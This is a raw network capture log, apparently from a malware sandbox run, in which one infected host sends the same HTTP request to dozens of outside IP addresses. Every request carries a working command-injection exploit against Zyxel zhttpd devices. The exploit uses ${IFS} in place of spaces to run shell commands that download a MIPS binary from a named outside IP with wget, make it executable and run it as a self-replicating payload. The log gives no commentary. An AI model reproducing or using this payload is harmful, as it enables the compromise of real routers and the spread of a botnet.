                                      Jan 14, 2024 15:50:48.348659039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4836192.168.2.144572474.3.176.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.348690987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4837192.168.2.1443700164.149.168.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.348738909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4838192.168.2.1459672128.91.10.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.348783970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4839192.168.2.1440106186.53.100.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.348838091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4840192.168.2.1432842128.67.148.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.348907948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4841192.168.2.145503017.79.220.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.348972082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4842192.168.2.1456738223.166.54.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.349004984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4843192.168.2.1452706152.160.0.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.349065065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4844192.168.2.1438146100.40.171.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.349143982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4845192.168.2.145453841.139.140.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.349203110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4846192.168.2.1448858159.21.29.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.349244118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4847192.168.2.1435020219.238.38.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.349304914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4848192.168.2.1440370129.162.105.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.349344015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4849192.168.2.1443596166.170.226.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.349397898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4850192.168.2.1441248166.13.88.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.349437952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4851192.168.2.144361898.54.252.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.349517107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4852192.168.2.143630072.48.138.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.349575043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4853192.168.2.1444700212.118.19.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.349634886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4854192.168.2.1457586164.96.149.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.349688053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4855192.168.2.144382093.43.54.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.349765062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4856192.168.2.1433356213.159.122.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.349822998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4857192.168.2.144280864.214.101.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.349877119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4858192.168.2.1456638160.163.222.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.349936962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4859192.168.2.1444150187.8.80.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.349984884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4860192.168.2.1433526113.30.134.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350023031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4861192.168.2.145821863.223.125.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350112915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4862192.168.2.1435458185.10.214.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350174904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4863192.168.2.1457814103.88.23.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350214005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4864192.168.2.1439990193.216.144.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350255966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4865192.168.2.1432964166.90.50.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350341082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4866192.168.2.1446674170.96.52.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350385904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4867192.168.2.1440096197.19.197.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350460052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4868192.168.2.1442066187.21.63.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350496054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4869192.168.2.145664449.194.115.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350557089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4870192.168.2.145048639.107.125.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350614071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4871192.168.2.1435236115.117.248.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350660086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4872192.168.2.1456666205.144.103.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350712061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4873192.168.2.143617492.239.59.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350773096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4874192.168.2.1445802197.28.55.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350811005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4875192.168.2.143752018.164.150.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350861073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4876192.168.2.1434666181.77.243.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350909948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4877192.168.2.144093277.36.158.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350960016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4878192.168.2.144097618.121.3.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.350999117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4879192.168.2.1450316167.101.41.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.351073027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4880192.168.2.145594450.146.19.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.351135015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4881192.168.2.1459644187.219.8.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.351193905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4882192.168.2.1437466172.34.58.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.351257086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4883192.168.2.1449186122.112.207.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.351321936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4884192.168.2.1434600164.20.63.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.351372004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4885192.168.2.143853446.70.9.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.351423979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4886192.168.2.1439686102.17.108.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.351476908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4887192.168.2.1453234187.253.126.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.351526976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4888192.168.2.1436814190.90.144.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.351588011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4889192.168.2.1439428170.26.224.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.351653099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4890192.168.2.1460166179.139.214.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.351697922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4891192.168.2.1436324175.203.182.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.351739883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4892192.168.2.145899243.5.25.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.351816893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4893192.168.2.143347863.15.95.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.351880074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4894192.168.2.1450424159.156.216.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.351927996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4895192.168.2.1456924179.212.48.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.351967096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4896192.168.2.1444026205.88.207.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.352010012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4897192.168.2.143966473.83.134.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:48.352051020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4898192.168.2.1459978144.53.237.183443
                                      TimestampBytes transferredDirectionData
